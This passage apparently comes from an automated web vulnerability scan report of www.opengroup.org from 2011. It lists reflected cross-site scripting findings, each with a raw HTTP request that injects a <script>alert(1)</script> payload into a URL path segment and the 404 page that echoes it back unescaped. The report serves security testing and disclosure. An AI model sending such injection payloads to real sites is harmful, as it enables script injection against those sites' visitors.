User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.3.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:09 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5155

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<!-- re_url = /events1cf72--><script>alert(1)</script>d544780bb6c/sponsor-exhibit.htm -->
...[SNIP]...

1.45. http://www.opengroup.org/events/sponsor-exhibit.htm [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /events/sponsor-exhibit.htm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6b1d"><script>alert(1)</script>cdbe446a6e7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /eventsf6b1d"><script>alert(1)</script>cdbe446a6e7/sponsor-exhibit.htm HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.3.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:04 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5152

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<input type=hidden name=lost value="/eventsf6b1d"><script>alert(1)</script>cdbe446a6e7/sponsor-exhibit.htm">
...[SNIP]...

1.46. http://www.opengroup.org/events/sponsor-exhibit.htm [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /events/sponsor-exhibit.htm

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49b7b"><script>alert(1)</script>c9155194fff was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /events/sponsor-exhibit.htm49b7b"><script>alert(1)</script>c9155194fff HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.3.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:25 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5152

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<input type=hidden name=lost value="/events/sponsor-exhibit.htm49b7b"><script>alert(1)</script>c9155194fff">
...[SNIP]...

1.47. http://www.opengroup.org/events/sponsor-exhibit.htm [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /events/sponsor-exhibit.htm

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload f73ce--><script>alert(1)</script>eb1f8baa7f8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /events/sponsor-exhibit.htmf73ce--><script>alert(1)</script>eb1f8baa7f8 HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.3.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:32 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5155

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<!-- re_url = /events/sponsor-exhibit.htmf73ce--><script>alert(1)</script>eb1f8baa7f8 -->
...[SNIP]...

1.48. http://www.opengroup.org/events/sponsor-exhibit.htm [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /events/sponsor-exhibit.htm

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1aab5<script>alert(1)</script>2fa9f53bf11 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /events/sponsor-exhibit.htm1aab5<script>alert(1)</script>2fa9f53bf11 HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.3.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:29 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5146

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/events/sponsor-exhibit.htm1aab5<script>alert(1)</script>2fa9f53bf11<br>
...[SNIP]...

1.49. http://www.opengroup.org/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d03a9<script>alert(1)</script>8588ad7c49d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icod03a9<script>alert(1)</script>8588ad7c49d HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.1.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:08 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 4228

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/favicon.icod03a9<script>alert(1)</script>8588ad7c49d<br>
...[SNIP]...

1.50. http://www.opengroup.org/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 60e14--><script>alert(1)</script>e2d1c01bf64 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico60e14--><script>alert(1)</script>e2d1c01bf64 HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.1.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:11 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 4234

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<!-- re_url = /favicon.ico60e14--><script>alert(1)</script>e2d1c01bf64 -->
...[SNIP]...

1.51. http://www.opengroup.org/member/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /member/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9518a"><script>alert(1)</script>7cfc26038a0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /member9518a"><script>alert(1)</script>7cfc26038a0/ HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/events/sponsor-exhibit.htm
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.4.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:09 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5147

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<input type=hidden name=lost value="/member9518a"><script>alert(1)</script>7cfc26038a0/">
...[SNIP]...

1.52. http://www.opengroup.org/member/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /member/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e150e<script>alert(1)</script>79cf08e9fff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /membere150e<script>alert(1)</script>79cf08e9fff/ HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/events/sponsor-exhibit.htm
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.4.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:11 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5141

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/membere150e<script>alert(1)</script>79cf08e9fff/<br>
...[SNIP]...

1.53. http://www.opengroup.org/member/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /member/

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 55638--><script>alert(1)</script>939d930983d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /member55638--><script>alert(1)</script>939d930983d/ HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/events/sponsor-exhibit.htm
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.4.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:14 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5150

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<!-- re_url = /member55638--><script>alert(1)</script>939d930983d/ -->
...[SNIP]...

1.54. http://www.opengroup.org/togaf/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /togaf/

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload d840c--><script>alert(1)</script>b085a6e8f6a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /togafd840c--><script>alert(1)</script>b085a6e8f6a/ HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=TOGAF
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:49:26 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 4224

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<!-- re_url = /togafd840c--><script>alert(1)</script>b085a6e8f6a/ -->
...[SNIP]...

1.55. http://www.opengroup.org/togaf/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /togaf/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 26e07<script>alert(1)</script>229d277a473 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /togaf26e07<script>alert(1)</script>229d277a473/ HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=TOGAF
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:49:24 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 4218

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/togaf26e07<script>alert(1)</script>229d277a473/<br>
...[SNIP]...

1.56. http://www.opengroup.org/togaf9/cert/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /togaf9/cert/

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 9edeb--><script>alert(1)</script>120de7a4391 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /togaf99edeb--><script>alert(1)</script>120de7a4391/cert/ HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/togaf/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.1.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:00 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5125

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<!-- re_url = /togaf99edeb--><script>alert(1)</script>120de7a4391/cert/ -->
...[SNIP]...

1.57. http://www.opengroup.org/togaf9/cert/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /togaf9/cert/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4fa9b<script>alert(1)</script>23835d6a4f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /togaf94fa9b<script>alert(1)</script>23835d6a4f/cert/ HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/togaf/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.1.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:57 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5113

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/togaf94fa9b<script>alert(1)</script>23835d6a4f/cert/<br>
...[SNIP]...

1.58. http://www.opengroup.org/togaf9/cert/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /togaf9/cert/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77a7d"><script>alert(1)</script>5d373802e00 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /togaf977a7d"><script>alert(1)</script>5d373802e00/cert/ HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/togaf/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.1.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:55 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5122

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<input type=hidden name=lost value="/togaf977a7d"><script>alert(1)</script>5d373802e00/cert/">
...[SNIP]...

1.59. http://www.opengroup.org/togaf9/cert/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /togaf9/cert/

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload a8972--><script>alert(1)</script>2670c9f9ea1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /togaf9/certa8972--><script>alert(1)</script>2670c9f9ea1/ HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/togaf/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.1.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:18 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5125

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<!-- re_url = /togaf9/certa8972--><script>alert(1)</script>2670c9f9ea1/ -->
...[SNIP]...

1.60. http://www.opengroup.org/togaf9/cert/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /togaf9/cert/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 296c2"><script>alert(1)</script>a8f2df5e418 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /togaf9/cert296c2"><script>alert(1)</script>a8f2df5e418/ HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/togaf/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.1.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:09 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5122

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<input type=hidden name=lost value="/togaf9/cert296c2"><script>alert(1)</script>a8f2df5e418/">
...[SNIP]...

1.61. http://www.opengroup.org/togaf9/cert/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /togaf9/cert/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e1cf2<script>alert(1)</script>e0cfa26c479 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /togaf9/certe1cf2<script>alert(1)</script>e0cfa26c479/ HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/togaf/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
